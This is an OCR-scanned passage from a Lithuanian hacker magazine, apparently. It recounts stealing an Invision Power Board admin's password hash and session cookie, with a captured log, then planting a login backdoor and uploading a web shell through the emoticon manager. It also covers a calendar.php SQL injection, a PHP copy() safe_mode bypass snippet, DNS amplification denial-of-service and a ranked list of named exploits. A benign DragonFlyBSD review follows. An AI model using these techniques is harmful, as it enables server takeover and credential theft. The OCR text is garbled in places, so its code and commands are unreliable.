versijos įdiegtos jūsų serveryje? Svetainėje aš apie tai nieko ne- 
radau. Man tai labai svarbu. 

Iš anksto ačiū!“. 

Na ir, be jokios abejonės, pranešimo pabaigoje pridėjau tau jau 
pažįstamą nuodingają eilutę. Vos po keliu valandų mano sniferyje 
jau buvo administratoriaus slaptažodžio hešas ir sesijos identi- 
fikatorius. Greitai pakeitęs savo sausainukus į administratoriškus, 


IPB paslaptys 

Perkeliam shellą 

Nepasiruošusiam vartotojui gali iškilti pakankaai logiškas 
klausimas: ar galima per IPB administravimo skydelį įkelti web 
shellą? Žinoma, kad galima. Parašysiu, kaip tai daroma. 


[IPB 1.3] Užeinam į skyrelį Administration, spaudžiam Man- 
age Emoticons, nusileidžiam į puslapio apačią ir ten matom 
tokią eilutę: „Upload an Emoticon to the emoticons directory“. 
Spaudžiam Browse mygtuką ir lokaliame kompiuteryje iš bylų 
sąrašo išsirenkame skriptą su web shellu. Į kokį katalogą bus 
įkeltas shellas, priklauso nuo forumo versijos: 

1.3 — /forum/html/emoticons/shell.php 

2.* — /forum/style emoticons/default/shell.php 


[IPB 2.*] Pasirenkame LOOK ė: FEEL, tada — Emoticon 
Manager. Čia reikės uždėti varnelę ties katalogu, į kurį bus 
užkraunamos šypsenėlės — mūsų atveju tai bus web shellų 
skriptams skirtas katalogas. 


n OUERY: member id=113; pass hash-MMc0543111327673ca822389fb; Mybids=,; session id=c6413446c032e31f4f231d36a3a6bfab 
REFERER: http://www.viahost.ru/forum/index.php?act=Msga CODE=03A4VID=in84MSID=165 


AGENT: Opera/9.00 (Windows NT 5.1; U; en) 
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aš įėjau į forumą. Viršutiniame kairiame kampe esantis užrašas 
bylojo, kad mano slapyvardis dabar yra „Support“. 


[Vabaliukų įdiegimas] Po kelių minučių man iškilo klausimas: 
kaip forume įsitvirtinti administratoriaus teisėmis? Logiška, 
kad geriausias tam būdas būtų taip pakeisti paties forumo 
išeities tekstus, kad jis esant tam tikroms sąlygoms į admin- 
istravimo zoną įleistų be jokių slaptažodžių. Pats supranti, kad 
tokių pakeitimų variantų labai daug. Aš net pagalvojau, kad 
tai greičiausiai jau išnagrinėta tema ir kad jau yra paruoštų 
trojanais užkrėstų skriptų rinkinių. Aš kreipiausi į antichat.ru 
„profesionalus“ ir gavau nepaprastą atsakymą. Vienas jaunuolis 
su k1bOrgo slapyvardžiu paprasčiausiai pasiūlė administravimo 
zonoje pašalinti autentifikacijos formą, kad prie forumo galėtų 
prisijungti kiekvienas norintis. Tai savo esme marazmiškas 
sprendimas, kuris mano veide sukėlė šypseną :). Aš pasiel- 
giau kitaip: į kiekvieną atitinkamą bylą (admin functions.php, 
login.php ir są! mysąl.php) toje vietoje, kur yra autentifikacijos 
blokas, aš per || (loginį „arba“) pridėjau GET parametro per- 
davimo skriptui sąlygą su ilga ir tik man vienam žinoma reikšme. 
Tai išsprendė visas problemas, o aš populiariame serveryje 
sėkmingai įrengiau bekdorą. 


[Šviežia injekcija]Neseniai vaikinai iš ru24 surado naują 
klaidą. Skripto calendar.php funkcijoje cal event save( 
$type="add" ) nėra tikrinamas kintamojo event. id tipas: 


Seven! id = Šthis-> ipsdass- > input[ event id']; 


Šis kintamasis tiesiogiai įterpiamas į duomenų bazei 
į užklausą: 


Sthis- > ipsdlass- > DB-> simple. conshud( anay( 'seled'= >, om“ => 
"cal events“, "where" => „event id=Ševent id“ ) ); 


Tai leidžia modifikuoti duomenų bazei siunčiamą užklausą: 
index.php?act=calendarėcode =doeditėtype =gg94event 
id= SOL. Norint sėkmingai eksploatuoti šį pažeidžiamumą, 
reikia turėti kalendoriaus įvykių valdymo teises (pridėjimas/ 
redagavimas). Norint pataisyti šį pažeidžiamumą, pakanka 
$event id = $this->ipsclass->input['event id']; pakeisti į 
$event id = intval($this->ipsclass->input['event. id'|);. 


[Greitas dumpinimas| 

Kad ir kaip būtų keista, tačiau dažnai daugelis pradedančiųjų 

g Kri iaip je saugomas duomenų 
bazes (db dump), todėl įėję į administravimo zoną pasimeta. 


„Rezervinė 

rezervinį kopijavimą“. Vis dėlto aš manau, kad daryti visos 
duomenų bazės kopiją — tai tik bereikalingas laiko švaistymas. 
Paprasčiau būtų peržiūrėti reikiamą lentelę, kas daroma taip: 
„Kita“ —> „SOL valdymas“ -> „Įrankiai“ -> pasirenkame 
reikiamą lentelę. Visų forumo dalyvių prisijungimo vardai ir 
slaptažodžiai saugomi lentelėje „ibf members“ arba „ibf ses- 
sions“. 


BŪK KONKRETUS IR UŽDAVINĖK 
KONKREČIUS KLAUSIMUS! PRIEŠ 
SIŲSDAMAS SAVO PROBLEMĄ | HACK-FAG, 
STENKIS JĄ KUO IŠSAMIAU APRAŠYTI. TIK 
TUOMET AŠ GALĖSIU IŠ TIESŲ TAU PADĖTI, 
ATSAKYTI BEI PARODYTI GALIMAS KLAIDAS. 
VENK BENDRINIŲ KLAUSIMŲ, PANAŠIŲ Į 

„KAIP NULAUŽTI INTERNETĄ?“ — TU TIK 
APKRAUSI SAVO IR MANO PAŠTO DĖŽUTES. 
IŠ MANĘS GRĘŽTI KO NORS UŽ DYKĄ (IN- 
TERNETO, SHELLŲ IR PANAŠIAI) NEVERTA, 
NES AŠ PATS GYVENU IŠ HUMANITARINĖS 
PAGALBOS! 


Pastaruoju metu adminai daug laiko skiria PHP 
konfigūravimui, todėl aš vis dažniau matau įjungtą 
safe mode bei įjungtą funkciją open base dir. 
Kokios pažeidžiamos funkcijos gali mane išgelbėti 
tokioje liūdnoje padėtyje? 


Paskaičiavus ant pirštų, galima sugeneruoti štai toki 
„Skylėtų“ funkcijų sarašą, kurios padės nulaužti neva 
apsaugotą serverį. Gaila, kad ne visos funkcijos iš 
žemiau išvardintųjų yra PHP versijoje pagal nutylėjimą. 

Pateiksiu jas pagal šiandienos aktualumą: 

1. Funkcija curl init() (nėra pagal nutylėjimą); 

2. Funkcija include(); 

3. Sąveika su DB. Norint tai įgyvendinti, duomenų bazėje turi 

būti sukonfigūruotos atitinkamos teisės (įvertink, kad serveryje 

bazės gali ir nebūti); 

4. Funkcija mb send mail() (nėra pagal nutylėjimą); 

5. Funkcijos imap list() ir imap bodyl); 

6. Funkcija copy). 

Pažeidžiamas funkcijų versijas vienai ar kitai PHP versijai tu 

gali rasti bugtrag puslapiuose. 
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Kaip man nustatyti, kokia PHP versija įdiegta pas 
hosterį? 


(0 


Pats tiksliausias būdas — į serverį įkelti bylą 

(O) (pavyzdžiui, info.php) tokiu turiniu: <?phpinfo();?>. 

PHP informacijoje tu greitai rasi jos versiją. Jeigu 

adminas uždraudė phpinfo() funkcija arba tavo teisės 

per daug apribotos — tiesiog pabandyk kreiptis į 

neegzistuojantį puslapį tame serveryje. Jeigu jame bus 

įjungtas serverio informacijos išvedimas, tu pamatysi Apache, 

PHP ir galbūt kitų modulių versijas. Įvertink tai, jog šią 
informaciją galima lengvai suklastoti! 


mode ir apribojo mane mano namų katalogo ribose. 
Tačiau aš išstudijavau bugtrag, kur radau, jog įdiegtoje 
PHP versijoje yra funkcijos copy() klaida. Kaip gi man 
dabar pasinaudoti šia klaida ir gauti man reikalingą 
bylą? Dokumentas yra čia: /home/hacker/need.txt, o aš esu 
/home/freehosta/public html ribose. 


(O) Taigi taigi. Kaip tik mano atveju adminas įjungė safe 


Tu pats beveik radai atsakymą! Reikėjo ne tik pažiūrėti 

į pažeidžiamą PHP versiją, bet ir paskaityti bugtrag'e 

pateiktą full disclosure :). 

Jeigu PHP iš tiesų neužlopytas, tai reikiama informacija 

beveik tavo rankose. Teliko parašyti nedidelį skriptą, 
kuris eksploatuotų šį pažeidžiamumą. 


7 

Sneedfile “home/hacker/sp. 5.hXI“; 

Sautputfile “/home/freehosta/public html/sp. s.bt“; 
copy(,compress.zlib://“.Sneedfile,Soutputfile); 

> 


Persiunti šį skniptą į serverį ir atidarai. Jeigu dabar tinkama Mėnulio 
fazė, tai public html kataloge turėtų atsirasti pageidaujama byla. 
Nepamiršk priėjimo teisių, nes paskui ilgai ieškosi kokio nors kito 
metodo vien tik dėl savo paties neatidumo. 


Kas yra rekursyvios DNS užklausos ir kaip jas pan- 
audojant sukelti atsisakymą aptarnauti (DoS)? 


Norint išspręsti šią problemą, reikia šiek tiek pasinerti į 
teoriją. Išskiriami du DNS užklausų tipai: rekursyviosios 


ir iteratyviosios. Rekursyviosios užklausos atveju vardų 

serveris informaciją turi surasti savarankiškai ir klientui 
grąžinti galutinį atsakymą. Tai reiškia, kad gavęs rekursyvia 
užklausą, vardų serveris atsakymo iš pradžių ieško pas save 
(keše), o jo neradęs turi pats kreiptis į kitus vardų serverius, 
pavyzdžiui, į šakninius serverius (tokia užklausa bus iteratyvi). 
Jie tau iš karto nepateiks atsakymo, tačiau nukreips į kitus DNS 
serverius. Vardų serveris tikrins visas jam pateiktas nuorodas 
tol, kol neras reikiamos informacijos. 
Iteratyvios užklausos atveju vardų serveris turi iš karto pateikti 
atsakymą, nesikreipdamas į kitus DNS serverius. Jeigu šis 
serveris negali pateikti reikalaujamos informacijos, jis turi 
grąžinti nuorodą į kitą vardų serverį, kuris greičiausiai gali 
atsakyti į šią užklausą. 
Kaip matai, rekursyvių užklausų atveju visos su atsakymo 
paieška susijusios problemos gula ant DNS serverio pečių 
ir jis yra priverstas pats užklausti informacijos kituose DNS 
serveriuose bei apdoroti iš jų gaunamą informaciją. Taip gavęs 
daug rekursyvių užklausų DNS serveris gali išeikvoti resursus 
ir atsisakyti aptarnauti tolimesnes užklausas. 
Tačiau labiau tikėtinos ir pavojingesnės yra paskirstytos atakos, 
kuriose naudojamas atakuojamas DNS serveris. Jos gali būti 
sėkmingai panaudotos paskirstytose DoS atakose, kadangi 
DNS užklausos veikia per UDP protokolą, todėl atakuojančiajam 
nieko nereiškia suklastoti šaltinio IP adresą. Išsiuntus daugybę 
užklausų į skirtingus DNS serverius su serverio-aukos šaltinio 
adresu, šie sukels didelį į server-aukaą nukreiptą tinklo srautą. 
Paskirstytose atakose geriau naudoti rekursiją palaikančius 
serverius, kadangi iš jų gaunamas didesnis dauginimo koefi- 
cientas, ypač jeigu naudojamos EDNS (RFC 2671) užklausos, 
kuomet koeficientas gali siekti 60 ir daugiau. 
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Klaidos ir skaičiai 

GERAI PASIRAUSUS INTERNETE, GALIMA RASTI DAUGYBĘ EKSPLOITŲ, SKIRTŲ PAČIOMS 
ĮVAIRIAUSIOMS SISTEMOMS. VIS DĖLTO LAUŽIMUI TINKAMŲ PROGRAMŲ IŠ TIESŲ NE TIEK 
JAU IR DAUG. KAD BŪTŲ PAPRASČIAU SUSIORIENTUOTI, MES PAĖMĖME PAČIAS POPULI- 
ARIAUSIAS OPERACINES SISTEMAS IR BALAIS ĮVERTINOME KIEKVIENOS IŠ JŲ REITINGĄ. 


1. freebsdsendfilex.c — 1196 

Šis lokalus eksploitas leidžia gauti priėjima prie branduolio atminties, kitaip tariant, prie 
ete/master.passwd bylos turinio. Rimtas šarvamušis visraktis, kuris puikiai Veikia su 
FreeBSD <5.4 versijomis. 


2. poppassd-freebsd.sh — 796 
Sis sknptas sugeneruoja veikiantį visraktį, su kuriuo galima sukelti savo lokalias teises, 
suid programoje Iv/kdant bet koki savo kodą. 


3. iosmash.c — 4446 
Senas eksploltas, kuris išnaudoja darbo su failų deskriptoriais trūkumus. Nors eksploitas ir 
senas, vis dar galima sutikti mašinų, kur jis veikia ir gali padėti gauti lokalias root teises. 


4. topex.c — 66 
usr'bintoo < top-3,5beta9 skirtas eksploltas. Programoje yra fomat-string tipo klaida, per 
kurią su šiuo skriptu galima sukelti savo teisės. 


1. InxFTPDsSI warez.c — 1494 
nux ftpd ss! 0.17 skirtas eksploitas. Per šio demono perpiklymą leidžia tau gauti lokalias 
ot teises. Draugiškas postūmis link saugumo tiems, kas pas save įdiegė linux fipd :). 


2. bigrip.c — 1706 

Eksploitas, kuris gali išjungti Linux su 2.4.22 ir 2.6.12 versijų branduoliais (galbūt ir 
kitais) sistemos valdomas mašinas. Kaip tai dažnai pasitaiko, pilnas perpildymų rinkinys 
r potenciali galimybė gauti lokalias »00! teises. 


3. poppassd-freebsd.sh — 994 

Opopper 4.08 skirtas eksploitas, kurį aš jau paminėjau tarp FreeBSD servisuose aptiktų 
populiarausių klaidų. Vis ta pati pasakėlė: privilegijų sukėlimas su nesudėtinga programėie, 
tik Linux sistemoje. 


4. linuxmr.c — 496 
Eksploitas išnaudoja daugybę 2.6.11 branduolio klaidų. Leidžia gauti priėjimą prie svetimų 
procesų atminties, atlikti DOS, apeiti tinklo filtravimą ir taip toliau. 
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1. ie xp pfv metafile.pm — 124 | 

Teisingai suformuota WMF byla leidžia bet kokioje Windows sistemoje įvykdyti bet 
kokį kodą. Nors klaida ir plačiai nuskambėjusi, dabar vis dar galima rasti neužiopytų 
mašinų. 


2. wmpbmpex.c — 246 
Šviežias šviežios klaidos eksploitas, Šį karta klaida slypi BMP bylų apdorojime, Simptomai 
ir pasekmės -— tokie patys. 


3. ms05-055.c — 114 ž 

Dvigubai -— kad būtų garantuota. Šis principas nesuveikė „Microsoft“ programuotojams, 
kurie parašė du kartus iš atminties vieną struktūrą pašalinant kodą, Tai leido hakeriams 
sukurti eksploitą, kuris lokaliai sukelia įsilaužėlio teises. 


4. winsex.c — 596 
Microsoft WINS serveriui skirtas eksploitas. Klaida slypi replikacijos protokolo apdorojime 
ir leidžia sėkmingai įvykdyti laisvai pasirinktą kodą, 


„Ssolsockjack.c — 876 

is Solaris 8,9 skirtas eksploitas leidžia užbindinti suklastolą soketą per bet kurią, 
net ir atvirą TCP jungtį, įskaitant ir < 1024 jungtis. Kaip tikriausiai pats supranti, 
po to galima labai daug ką nuveikti, 


2. dupa-amd.c/dupa-sparc.c — 1196 

Atlikus perpildymą analizuojant LD AUDIT kintamąjį, Solaris 10 sistemai skirtas 
eksploitas leidžia gauti lokalias rod! teisos bei galimybę prie bet kurios su Id.s0 
biblioteka sukompiliuotos programos prijungti savo biblioteką. 


3. CVS Solaris.c — 996 

Klaidos esmė heap perpildymas CVS 1.11 ir 1.12 versijose analizuojant 
modifikavimo vėliavėlę. Eksploitas suteikia galimybę CVS serveryje įvykdyti 
bet kokį kodą. 


4. rootme.tar — 396 
Archyve sudėti eksploitai leidžia gauti lokalias root teises. Klaida slypi tame, 
kad esant tam tikroms sąlygoms net ir vartotojas su nenuliniu uid gali užkrauti 
branduolio modulius, 
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Raitai ant laumžirgio 
Asmeninė „DragonFlyBSD“ apžiūra 
EGZISTUOJANČIOS BSD ŠEIMOS OPE- 
RACINĖS SISTEMOS JAU KAIP „REIKIANT 
ĮGRISO. FREEBSD TOLIAU PAMAŽU VIRSTA 
LINUX, OPENBSD IŠLIEKA PARANOJIŠKAI 
SAUGIA, NETBSD PERKELIAMA | SKRU- 
DINTUVUS IR MIKROBANGŲ KROSNELES. 
JOKIŲ KARDINALIŲ PASIKEITIMŲ :). NORISI 
KAŽKO IŠ ESMĖS NAUJO IR ŠVIEŽIO? JEI- 
GU TAIP TUOMET PASIRUOŠK — | ŽAIDIMĄ 
ATEINA DRAGONFLYBSD. 


SCENA 


UNIXOID 


[Praėjusių dienų istorija] DragonFly atsirado išsiskyrus 
nuomonėms apie tolimesnį FreeBSD plėtojimąsi. Metju 
Dilonas (Mathew Dillon), vienas iš aktyviausių FreeBSD 
kūrėjų, aiškiai įsivaizdavo, į kokią pusę juda kompiuterių 
industrija, todėl reikalavo, Kad daugelis branduolio 
komponentų būtų iš esmės modifikuoti ir perdaryti. Deja, 
visuomenė atmetė tokius Meto pasiūlymus, todėl jis 
surinko programuotojų komandą ir 2003 metų liepos 16 
dieną freebsd-current forume pranešė, kad ateityje su 
FreeBSD branduoliu jis daugiau neturės nieko bendro, o 
visas savo pastangas nukreips į nuosavos OS kūrimą, kuri 
buvo ambicingai pavadinta DragonFlyBSD. 

1. Pažodinis sistemos pavadinimo vertimas — „Laumžirgis“, 
vienas tobuliausių gamtos kūrinių. 


CODING 


UNITS 
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2. Dragon — „Drakonas“, kinų mitologijoje simbolizuoja išmintį. 
3. Fly — „Skristi“: lengvumas, funkcionalumo neapsunkinimas. 

Į darbus kibta pasiraitojus rankoves, diena vijo dieną, programuotojus 
net sapnuose pildavo šaltas prakaitas nuo begalinių kodo eilučių 
reginių. Galų gale, nuo darbų pradžios praėjus vos pusei metų, 
2004 metų liepos 12 dieną pasaulis išvydo DragonFIyBSD 1.0. Si 
sistemos laida buvo grynai techninio pobūdžio, kitaip tariant, buvo 
labiau prezentacinė ir nepretendavo į stabilumą. Po kurio laiko (šį 
kartą metų neprireikė), 2005 metų balandžio 8 dieną, Metas mums 
dovanojo stabilią versiją — 1.2 (DragonFly naudojama Linux stiliaus 
laidų numeracija: 1.1 — devel, 1.2 — stable). Šioje versijoje tam 
tikra prasme jau įgyvendinti kai kurie sumanymai bei galimybės, tačiau 
svarbiausia — OS dabar teisėtai gali vadintis stabilia (ne mažiau nei 
FreeBSD 4). Šiandien paskutinė stabili versija — 1.4 — buvo išleista 
šių metų sausio 7 dieną. Šioje versijoje pranešama apie oficialų 
perėjimą į NetBSD jungčių (ported applications) sistemą — pkgsrc 
(anksčiau buvo naudojamos FreeBSD jungtys), apie skaitlingus tinklo 
posistemės ir VFS patobulinimus bei apie perėjimą į GCC-3.4. 


[Techninės detalės] DragonFly sistemoje įdomu tai, kad išoriškai 
jos neatskirsi nuo ketvirtosios šakos FreeBSD, tačiau daugelis 
esminių branduolio fragmentų buvo perrašyta (šiuo metu padaryta 
tik dalis suplanuoto darbo), todėl vidinė šios sistemos sandara 
visiškai kita. Norint suprasti padarytų pakeitimų tikslingumą, reikia 
sužinoti, Kuo gi Metju Dilonui neįtiko egzistuojančios technologijos 
ir ko jis, tiesą sakant, siekia: 

1. x86 architektūros dominavimas. 

2. Daugiabranduoliniai procesoriai kaip visų AK pagrindas. 

3. Pigių klasterių sukūrimo praktika remiantis tos pačios x86 
architektūros pagrindu. 


Pirmas teiginys visiškai aiškus, mes jau seniai matome šią 
tendenciją. Nesunku numanyti, jog ateityje mažai kas pasikeis (net 
Apple dalį savo makų gamina su x86). Būtent dėl to DragonFly visų 
pirma orientuojasi į šią architektūrą (o taip pat į AMD x86-64), iš 
išeities tekstų pašalintos visos užuominos apie egzotines platformas 
(pavyzdžiui, japoniška PC98). Nepaisant to, Metas neatmeta OS 
perkėlimo galimybės į, pavyzdžiui, PowerPC. 
Daugiabranduolinius procesorius mes jau galime pačiupinėti ir 
išbandyti, tačiau didesnio šių daikčiukų paplitimo galima tikėtis tik 
po keleto metų. Norint išspręsti branduolio blokavimo problemą, 
kuomet vienu metu procesai negali vykdyti skirtinguose proce- 
soriuose vykdomų sisteminių iškvietimų, DragonFly naudoja 
unikalų Iengvasvorių branduolio srautų (LWKT — Light-Weight 
Kernel Threads) modelį. Tokiame modelyje kiekvienam procesoriui 
skiriamas nepriklausomas užduočių planuotojas, o kiekvienam 
procesui branduolio viduje atitinkamai sukuriamas lengvasvoris 
srautas (thread). Siekiant įgyvendinti tokią realizaciją, teko iš 
esmės perdirbti vidinę branduolio struktūrą ir pridėti pranešimų 
mechanizmą (tokį, kurį naudoja mikrobranduolinėse OS). Dėl to 
DragonFly tarpusavio sąveika su branduoliu vyksta per pranešimus, 
osisteminių iškvietimų sąsaja — tai viso labo apvalkalas, kuris gali 
būti pakeistas į, pavyzdžiui, objektiškai orientuotą sąsają. 
Klasteriai — viena iš esminių DragonFly plėtojimosi krypčių. Norint 
padidinti OS darbo efektyvumą klasteriuose, VFS posistemė bus 
pilnai perrašyta ir paversta į savotišką pranešimų serverį. Beje, toks 
architektūros pakeitimas ateityje leis visas failų sistemas iškelti į 
vartotojo erdvę, kas labai gerai net ir mums, paprastiems varto- 
tojams. Taip pat bus naudojama visiškai nauja globali kešavimo 


infrastruktūra, kuri be to, kad į bylų valdymo procesą pridės lank- 
stumo (pavyzdžiui, leis keliems procesams vienu metu skaityti ir 
rašyti vieną ir tą pačią bylą), taip pat leis išlošti ir našumo. 
DragonFly sistemai planuojama sukurti naują paketų valdymo 
sistemą, su kuria OS atnaujinimas taps paprastu ir maloniu 
užsiėmimu. Specialiai paketinio valdymo sistemos realizacijai buvo 
sukurtas naujas bylų tipas — variantinė simbolinė nuoroda, kuri 
priklausomai nuo tam tikros sąlygos rodo į skirtingas bylas. 
Dinaminiam įrenginių bylų (/dev) sukūrimui nuspręsta naudoti devd 
demoną, o ne apkrauti branduolį papildomu kodu, kaip kad tai 
padaryta FreeBSD OS. Ir galų gale, pasak Meto, dar DragonFly-1.5 
pasirodys iš OpenSolaris perkelta failų sistema ZFS. Nepaisant 
menamos naujosios OS orientacijos į serverius, Metas nepraleidžia 
progos pareikšti, kad jo OS yra daugiatikslė, t.y. funkcionalumo 
atžvilgiu nebus nuskriausti nei didelių klasterių savininkai, nei 
naminių AK vartotojai. 


ĮGaudom laumžirgi] Teorija lieka teorija, tačiau laikas būtų 
pagalvoti ir apie praktiką. Šiame skyrelyje bus pasakojama apie 
„Laumžirgio“ įdiegimą ir naudojimą. 

Iš pradžių mums reikia gauti pačios OS distributyvą. Čia mes ir susi- 
duriame su pirmaja problema. Esmė tame, kad šiuo metu praktiškai 
neimanoma kur nors nusipirkti diską su DragonFly. Lieka vienintelis 
būdas — iš kurio nors projekto veidrodžių parsisiųsti sistemos iso 
atvaizdą, Tam apsiginkluojame wget'u arba kokia kita atitinkama 
programa ir parsisiunčiame šią bylą: http://chlamydia.fs.ei.tum.de/ 
pub/DragonFly/iso- images/dfly-1.4.0 REL.iso.gz (-80 Mb). (Prie 
žumalo pridedamame diske tu galėsi rasti paskutinę DragonFlyBSD 
versiją — red.past.). Iš karto rekomenduoju su fdisk ar kokia kita 
tam tinkama programa naujajai OS sukurti atskirą particiją. Gavus 
ir į CD įrašius disko atvaizdą, įdedame jį į įrenginį ir užsikrauname. 
Standartinis DragonFly užkroviklis mus pasitiks sveikindamasis su 
meniu ir laumžirgio atvaizdu, kuris užėmė FreeBSD velniuko vietą. 
Nuspaudus vienetą, branduolys perims valdymą ir prieš akis pradės 
mirgėti ryškiai baltos spalvos eilutės (taip DragonFly sistemoje 


Fi-Help F16-Kefresh Displa 


Welcome to the DragonFlų BSD Live CD. 


bragonFlų BSD Is an eff icient and elegant BSD Unlx-derived operating 
system. Por more Information, ser 


btip: 74 „dragonf lybsd „org 

From this CD, you can boot into Dragonfly "Live" (without instaliinų it) 
to evaluate It, to install! it manuallų, or to troubleshoot problems with an 
cxistinų Installation, using either a Command prompt or menų-driven 
utilities. 


Als0, y0u can use this autometed application to assist you In Installing 
Dragonfly RSD on this computer and conf Iguring it once it 14 installed, 


ALMA TAR BA < Conf igure an Installed System > 
< Live es > < Exit to Live CD > < Reboot this Computer > 


[Keletas žodžių apie „pkgsrc“] 

Pkgsrc — tai jungčių sistema (kažkas panašaus į FreeBSD 
naudojamus /usr/ports), kuri iš pradžių buvo skirta NetBSD. Ji 
išsiskiria savo elegantiškumu ir aukštu perkeliamumu (gali būti 
naudojama Linux, Solaris, FreeBSD ir kitose OS), todėl būtent 
dėl šios priežasties ją naudoja DragonFly. Neigiamas pkgsrc 
niuansas — kol kas dar nedidelis „portintų“ programų skaičius 
(6000 prieš 13000 FreeBSD sistemoje). 
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išskiriami branduolio pranešimai). Pabaigus užkrovimą, mums bus 
pasiūlyta užsiregistruoti sistemoje root vardu (greičiausiai tam, 
kad būtų galima šį diską panaudoti sistemai atstatyti) arba vietoje 
vardo įvesti installer ir pradėti sistemos įdiegimą. Aš susilaikysiu 
nepapasakojęs apie įdiegimo procesą, kadangi DragonFly vietoje 
FreeBSD sysinstall naudoja universalų įdiegiklį BSD Installer, kuris 
buvo parašytas Google suorganizuotos open-source akcijos Sum- 
mer of Code metu. Išskirtinis šio įdiegiklio bruožas -— ypatingai 
paprastas įdiegimo procesas. 

Dar vienas įdomus niuansas: priešingai nei FreeBSD sistemoje, Drag- 
onFly diske nėra įdiegimo paketų. Pats diskas — tai bazinė sistema, 
kuri įdiegimo metu su komanda cpdup paprasčiausiai nusikopijuoja į 
kietąjį diską. Iš pirmo žvilgsnio viskas atrodo teisingai: bazinė sistema 
įdiegiama be papildomų kūno judesių, o po to ji su pkgsrc auginama 
iki priimtino lygio, juo labiau, kad visi papildomi paketai kartu su 
X'ais diegiami į /usr/pkg/. Vis dėlto man išlieka paslaptimi, kodėl 
DragonFly kūrėjai mano, jog į šį bazinį programinės įrangos rinkinį 
be tokių būtinų komponentų, kaip gcc kompiliatorius, papildomai 
turi būti įtraukti sendmail, bind, kerberos ir žaidimų rinkinys. 
Pabaigę įdiegimą perkrauname mašiną. Ką gi mes gavome? | kietąjį 
diską įdiegę DragonFly? Gavome nuo ketvirtosios šakos FreeBSD 
praktiškai nesiskiriančią sistemą su minimaliu baziniu programinės 
įrangos rinkiniu. DragonFlyBSD beveik tiksliai atkartoja FreeBSD, 
todėl nėra prasmės pasakoti apie sistemos lituanizavimą, jos 
konfigūravimą ir naujų vartotojų pridėjimą. Geriau papasakosiu apie 
tai, kuo mūsų aptariamas „Laumžirgis“ skiriasi nuo FreeBSD. 
Nuotrauka. DragonFly įdiegiklio pasisveikinimas 

Pirma — tai jungčių sistema. Vietoje įprastinės /usr/ports čia nau- 
dojama NetBSD jungčių sistema, kurią teks gauti savarankiškai 
iš vieno iš NetBSD veidrodžių. Čia tenka susidurti ir su antrąja 
problema — tinklo susijungimo konfigūravimu (tiek ir paties jungčių 
medžio gavimui, tiek ir atskirai paimtos jungties įdiegimui). Laimė, 
gauti priėjimą prie interneto čia galima taip pat, kaip ir FreeBSD 
sistemoje, pakanka žvilgtelėti į atitinkamą straipsnį ar knygą. Taigi, 
tarkim, internetas pas mus jau yra. Tuomet nedaug ką lieka daryti: 
parsisiųsti ir įdiegti pkgsrc: 


2 Teidi 

7 (d Just 
X tar 21 /lmp/pkgstc.tor.gZ 
2 chown R rootawheel pkgstc 


0 /timp/pkąsictar.gz Ap://tp.NeiBSD.org/pub/NetBSD/packages/pkgstc.tar.gz 


Toliau paruoškime dvejetainiams paketams (/usr/pkg) skirtą vietą 
ir įdiekime jų valdymo įrankius: 


4 cd /ust/pkgstc/boolstrap 
4 /hootstrap 


Su pkgsrc reikiamą paketą įdiegti taip pat paprasta, kaip ir su 
FreeBSD jungčių sistema. Pakanka pereiti į pagal sritis surūšiuotą 
medį, išsirinkti reikiamą jungtį ir surinkti išganingają komandą 
bmake install clean, pavyzdžiui: 


2 td /ust/pkgsic 
4 cd editors/vim 
4 bmake install cdeon 


Taip bus suformuotas ir į /usr/pkg katalogų struktūrą įdiegtas 
vim paketas (atkreipk dėmesį, kad X'ai bus idiegti ne į įprastinį 
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[ZFS — eilinė failų sistema? 

ZFS — tai nauja Sun Microsystems sukurta šiek tiek kitokios 
kokybės failų sistema. ZFS sistemoje įgyvendinti tokie gardūs 
dalykėliai, kaip duomenų ir pačios FS vientisumo kontrolė 
tikrinant kontrolines sumas, transakcijų žurnalo galimybė, „ko- 
pijavimo įrašymo metu“ mechanizmas, loginis disko particijų 
padalinimas (LVM ir vinum principu), pasirinktinas duomenų 
suspaudimas ir kt. Visa tai ZFS padaro ypatingai patikima (fsck 
čia visiškai nereikalingas), greita, keičiamo dydžio (scalable), 
tačiau tuo pačiu lengvai administruojama failų sistema (ko 
nepasakysi apie LVM). 


/usr/X11, 0 į /usr/pkg/xorg). Jungties paieškai gali naudoti skriptą 
/usr/pkgsrc/pkglocate. Išsamų visų jungčių aprašymą galima rasti 
html byloje /usr/pkgsrc/README.html. 

Paketų valdymui naudojami praktiškai identiški FreeBSD įrankiai: 
pkg add, pkg delete, pkg info. 

Be abejo, kaip ir kitų BSD šeimos atstovų atveju, branduolio ir 
bazinės sistemos išeities tekstai yra laisvai platinami, iš jų galima 
išmesti nereikalingus komponentus, pridėti tai, ko reikia, bei 
perkompiliuoti. Tiems, kas nori imtis savarankiško kompiliavimo, 
siūlau šį variantą. Pradžiai reikia parsisiųsti archyvą su išeities 
tekstais (http://chlamydia.fs.ei.tum.de/pub/DragonFly/snapshots/ 
src/src-Release-1.4.tar.bz2 (—70 Mb)) ir jį išpakuoti į katalogą 
/usr. Sukurkime naują branduolio konfigūracinę bylą: 


4 cd /ust/sty/sys 
* (p i386/conf/GENERIC i386/cont/MY KERNEL 


Atidarome konfigūracinę bylą ir paredaguojame ją pagal savo poreikius. 

Prireikus čia vėl gi galima konsultuotis su FreeBSD literatūra. Svarbiau- 

sia — nepamiršti aktyvuoti dviejų opcijų: SC PIXEL MODE ir VESA. Tai 

mums leis pasirinkti skirtingus konsolės grafinius režimus, pavyzdžiui, 
: Archivers 


Kudiob Audio tools 
: Benchmarking tools 
biologų: Sof tuare for the biological sciences 
cad: „CAD tools 
+ Communication prograns 
: Communication utilities 
: Document format and character code converters 
Cross-platfora development utilities 
crosspkgtools: Tools for cross-building pkgsrc 
databases: Databases 
devel: Development utilities 
: Editors 
: Enulators for other operating systems 
finance: Monetary, financial and related applications 
: Fonts 
: Games 


cross: 


geographų: Software for geographical-related uses 
: Graphics tools and libraries 
ham: Wireless communication tools and applications 
Inputnethod: Input method tools and libraries 
lanų: Programming languages 
mali: Electronic mail utilities 
math: Mathematics 
mnbone: Multi-cast backBone applications 
: Collections of other packages 
nisc: Miscellaneous utilities 
multimedia: Multimedia utilities 
net: Netuorking tools 
neus: Netuork neus 
parallėl: Applications dealing with parallelisn in conputing 
pkgtools: Tools for use In the packages Collection 
print: Desktop publishing 
security: Security tools 


su pkgsrė sistema dirbti lengva Ir patogu 
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[ĮMathew Dillon. Kas jis?] 

Mathew Dillon gerai žinomas tarp branduolių kūrėjų. Jam prik- 
lauso atnaujinta FreeBSD virtualios atminties sistema, remiantis 
